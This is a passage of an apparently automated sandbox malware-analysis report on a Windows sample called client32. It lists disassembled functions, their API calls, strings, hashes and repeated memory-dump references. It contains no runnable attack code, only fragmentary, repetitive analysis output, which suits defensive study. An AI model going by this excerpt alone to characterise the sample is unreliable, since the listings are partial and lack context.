                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                        • API String ID: 144328431-1024648535
                                                                                                                                        • Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                                        • Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
                                                                                                                                        • Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                                        • Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
                                                                                                                                        Function 11158220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,A0A8B03E,?,00000000,00000001), ref: 11158267
                                                                                                                                        • CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
                                                                                                                                        • wsprintfW.USER32 ref: 111582A7
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 111582B3
                                                                                                                                        • wsprintfW.USER32 ref: 11158367
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 11158408
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                        • API String ID: 3050498177-823534439
                                                                                                                                        • Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                        • Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
                                                                                                                                        • Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                        • Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
                                                                                                                                        Function 11112B00 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11112B55
                                                                                                                                        • CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
                                                                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
                                                                                                                                        • CoUninitialize.COMBASE(00000000), ref: 11112C61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                        • API String ID: 4195908086-2348320231
                                                                                                                                        • Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                        • Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
                                                                                                                                        • Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                        • Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
                                                                                                                                        Function 68910D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,68910F2B,27CEFB69,00000000,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D48
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 68910D5B
                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6893CB4C,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D76
                                                                                                                                        • _malloc.LIBCMT ref: 68910D8C
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?), ref: 68910D9F
                                                                                                                                        • _free.LIBCMT ref: 68910D84
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 68910DAF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                        • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                        • API String ID: 1360380336-1843585929
                                                                                                                                        • Opcode ID: 2d4c7f6d322f0a75955036bd77a51e6c2c05dd951f481ddc2939768623976686
                                                                                                                                        • Instruction ID: d412b9cd18be6b116ed19d84f13527f4d732333928a915bd3d159bd059510119
                                                                                                                                        • Opcode Fuzzy Hash: 2d4c7f6d322f0a75955036bd77a51e6c2c05dd951f481ddc2939768623976686
                                                                                                                                        • Instruction Fuzzy Hash: 3901F7B96483157BE7308B709C85F6B77ACAB92B04F50481CF5A69F680EA72F440C720
                                                                                                                                        Function 1105F706 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memmove.LIBCMT ref: 1105F71D
                                                                                                                                        • _free.LIBCMT ref: 1105F770
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • _free.LIBCMT ref: 1105F78C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1105F7C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalErrorFreeHeapLastLeaveSection_memmove
                                                                                                                                        • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s
                                                                                                                                        • API String ID: 4241856912-972392202
                                                                                                                                        • Opcode ID: 8b78972ff2ef7c4f36a2d7af3afaaec90c158693732ee178fb62e3972c1b702c
                                                                                                                                        • Instruction ID: 3bbb31bc911666711c2868e8336f915e83d4f5198759807ff36000dcfaec8d7f
                                                                                                                                        • Opcode Fuzzy Hash: 8b78972ff2ef7c4f36a2d7af3afaaec90c158693732ee178fb62e3972c1b702c
                                                                                                                                        • Instruction Fuzzy Hash: EC3173B6E00219ABDB95DB64CC40BAEF7BCBB44708F0441DDE519A7240EB346B84CF62
                                                                                                                                        Function 11141AB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                          • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                        • _memset.LIBCMT ref: 11141AF5
                                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                        • API String ID: 4251163631-545709139
                                                                                                                                        • Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                        • Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
                                                                                                                                        • Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                        • Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
                                                                                                                                        Function 1105FE2E Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 220registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 1105FEAB
                                                                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?), ref: 1105FF12
                                                                                                                                        • _free.LIBCMT ref: 1105FF24
                                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumExitProcessValue$ErrorLastMessage_free_strrchrwsprintf
                                                                                                                                        • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                        • API String ID: 809228333-161875503
                                                                                                                                        • Opcode ID: 20ed8e4f7a127c419030e1fad9ffb5210fd9748ab01ce83f3fe573825fb9846c
                                                                                                                                        • Instruction ID: 68c01e32377f0c834a65899b8bd60ce0b3952d100fbeb1b2b0cb0160ae45c03f
                                                                                                                                        • Opcode Fuzzy Hash: 20ed8e4f7a127c419030e1fad9ffb5210fd9748ab01ce83f3fe573825fb9846c
                                                                                                                                        • Instruction Fuzzy Hash: 1081F075A007469FE761CF64C880BABBBF8BF05708F044A1CE58A97681E770B549CBA1
                                                                                                                                        Function 110151F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 110152AA
                                                                                                                                        • _memset.LIBCMT ref: 110152EE
                                                                                                                                        • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
                                                                                                                                        Strings
                                                                                                                                        • NSLSP, xrefs: 11015338
                                                                                                                                        • %012d, xrefs: 110152A4
                                                                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
                                                                                                                                        • PackedCatalogItem, xrefs: 11015312
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                        • API String ID: 1333399081-1346142259
                                                                                                                                        • Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                        • Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
                                                                                                                                        • Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                        • Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
                                                                                                                                        Function 110618D9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
